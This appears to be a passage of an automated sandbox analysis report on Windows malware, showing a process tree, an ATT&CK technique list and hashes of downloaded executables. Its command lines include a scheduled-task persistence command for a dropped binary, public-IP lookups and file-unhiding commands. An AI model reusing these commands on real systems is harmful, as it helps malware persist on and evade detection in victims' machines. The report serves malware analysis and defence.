                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nzvrlbyt\nzvrlbyt.cmdline"
                                                                                                                                        4⤵
                                                                                                                                          PID:5060
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D.tmp" "c:\Users\Admin\AppData\Local\Temp\nzvrlbyt\CSC1312C72BB2E4C61A65FE894124AC34D.TMP"
                                                                                                                                            5⤵
                                                                                                                                              PID:4872
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\quo3sze0\quo3sze0.cmdline"
                                                                                                                                            4⤵
                                                                                                                                              PID:3368
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4A3.tmp" "c:\Users\Admin\AppData\Local\Temp\quo3sze0\CSCEF6864A0CA51486A87DB34F9F3E891C3.TMP"
                                                                                                                                                5⤵
                                                                                                                                                  PID:4624
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\1830.bi1"
                                                                                                                                            2⤵
                                                                                                                                              PID:4496
                                                                                                                                              • C:\Windows\system32\nslookup.exe
                                                                                                                                                nslookup myip.opendns.com resolver1.opendns.com
                                                                                                                                                3⤵
                                                                                                                                                  PID:1428
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\1250.bi1"
                                                                                                                                                2⤵
                                                                                                                                                  PID:2008
                                                                                                                                                  • C:\Windows\system32\nslookup.exe
                                                                                                                                                    nslookup myip.opendns.com resolver1.opendns.com
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3676
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1830.bi1"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2672
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1250.bi1"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2268
                                                                                                                                                      • C:\Windows\syswow64\cmd.exe
                                                                                                                                                        "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3816
                                                                                                                                                        • C:\Windows\system32\makecab.exe
                                                                                                                                                          makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\12EA.bin"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:540
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\3C91\FF9.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\OptionsUtil\setup.inf""
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1456
                                                                                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                                                                                attrib -r -s -h "C:\Users\Admin\AppData\Roaming\Microsoft\OptionsUtil\setup.inf"
                                                                                                                                                                3⤵
                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                PID:1516
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\C3C1\CAD.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\OptionsUtil\setup.rpt""
                                                                                                                                                              2⤵
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              PID:3296
                                                                                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                                                                                attrib -r -s -h "C:\Users\Admin\AppData\Roaming\Microsoft\OptionsUtil\setup.rpt"
                                                                                                                                                                3⤵
                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                PID:3756
                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                                            1⤵
                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            PID:640
                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding C75EB65F764E22C4E97485338F630E15 C
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4692
                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 2427A4AD86B930B7DB0061CE17A1810E
                                                                                                                                                                2⤵
                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                PID:3212
                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 998518D00546B915272E313E3286D524 C
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5040
                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding E9F5B6DCF8AA1AFACF81AD421AFC125C C
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4520
                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 91D5175653FEA07DBA2D48D496D543C1 C
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4252
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:832
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                        PID:4952
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          PID:4440
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x148,0x14c,0x150,0x11c,0x154,0x7feeb78dec0,0x7feeb78ded0,0x7feeb78dee0
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:4704
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0xf8,0xfc,0x100,0xcc,0x104,0x13f919e70,0x13f919e80,0x13f919e90
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:3068
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1116,3437357270320683360,192596982996867814,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4440_819182258" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1132 /prefetch:2
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5048
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1116,3437357270320683360,192596982996867814,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4440_819182258" --mojo-platform-channel-handle=1460 /prefetch:8
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:5108
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1116,3437357270320683360,192596982996867814,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4440_819182258" --mojo-platform-channel-handle=1604 /prefetch:8
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:3272
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1116,3437357270320683360,192596982996867814,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4440_819182258" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=1816 /prefetch:1
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      PID:2316
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1116,3437357270320683360,192596982996867814,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4440_819182258" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=1780 /prefetch:1
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      PID:3908
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1116,3437357270320683360,192596982996867814,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4440_819182258" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2156 /prefetch:2
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:2536
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1116,3437357270320683360,192596982996867814,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4440_819182258" --mojo-platform-channel-handle=2832 /prefetch:8
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:4516
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1116,3437357270320683360,192596982996867814,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4440_819182258" --mojo-platform-channel-handle=560 /prefetch:8
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:3980
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1116,3437357270320683360,192596982996867814,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4440_819182258" --mojo-platform-channel-handle=1684 /prefetch:8
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:5052
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1116,3437357270320683360,192596982996867814,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4440_819182258" --mojo-platform-channel-handle=2732 /prefetch:8
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              PID:1016
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_3BA9.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                          PID:3364
                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "481237835126202350-1129848533-1762666376547234642986996478-626882205-1727328056"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3340
                                                                                                                                                                                      • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                        taskeng.exe {70521AB8-C15B-46D1-9C1F-2F821E593AB9} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3624
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:3536
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:3876
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                  PID:2092
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4696
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  PID:2688
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3100
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:3268
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4504
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\webevej
                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\webevej
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                        PID:560
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1548
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4188
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:2040
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:2736
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4716
                                                                                                                                                                                                              • C:\Windows\sysWOW64\wbem\wmiprvse.exe
                                                                                                                                                                                                                C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:2260
                                                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7941a5c3-2deb-03dd-2f07-fb7c5c25b43c}\oemvista.inf" "9" "6d14a44ff" "00000000000005CC" "WinSta0\Default" "00000000000005D8" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                  PID:676
                                                                                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4192
                                                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                    DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12" "" "" "6d110b0a3" "0000000000000000" "000000000000063C" "0000000000000638"
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:3408
                                                                                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                      DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:tap0901.NTamd64:tap0901.ndi:9.0.0.21:tap0901" "6d14a44ff" "00000000000005CC" "00000000000005D8" "00000000000003B4"
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                      PID:2096
                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-854823409-13981120891329513651521979236-539261406-10749609801271522127-1075146022"
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3112
                                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                        PID:4160
                                                                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                          MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:3368

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Hidden Files and Directories

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1158

                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                        4
                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1130

                                                                                                                                                                                                                        Hidden Files and Directories

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1158

                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                        4
                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                        Software Discovery

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1518

                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                        7
                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                        7
                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1018

                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                        4
                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3618611.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          f74c42768182cf95528b4d32db116680

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c557f307d1d29e0bedb0233361d7605a2e94109a

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          d09b9025bf28610cb3def1d2c74fae649bb45a4ae8088cd21e65baa8d06d75f0

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          f34d8dbc38c4fa0b5ae8fe3572b0e6428a5acf9494ce9dbe3e9c3c8274f8158c7340b29966221288e56baec22d0bb50dc4404990e413ffa61f0650a6107e953b

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3618611.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          f74c42768182cf95528b4d32db116680

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c557f307d1d29e0bedb0233361d7605a2e94109a

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          d09b9025bf28610cb3def1d2c74fae649bb45a4ae8088cd21e65baa8d06d75f0

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          f34d8dbc38c4fa0b5ae8fe3572b0e6428a5acf9494ce9dbe3e9c3c8274f8158c7340b29966221288e56baec22d0bb50dc4404990e413ffa61f0650a6107e953b

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\5308226.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          3598180fddc06dbd304b76627143b01d

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          1d39b0dd8425359ed94e606cb04f9c5e49ed1899

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

                                                                                                                                                                                                                          SHA512

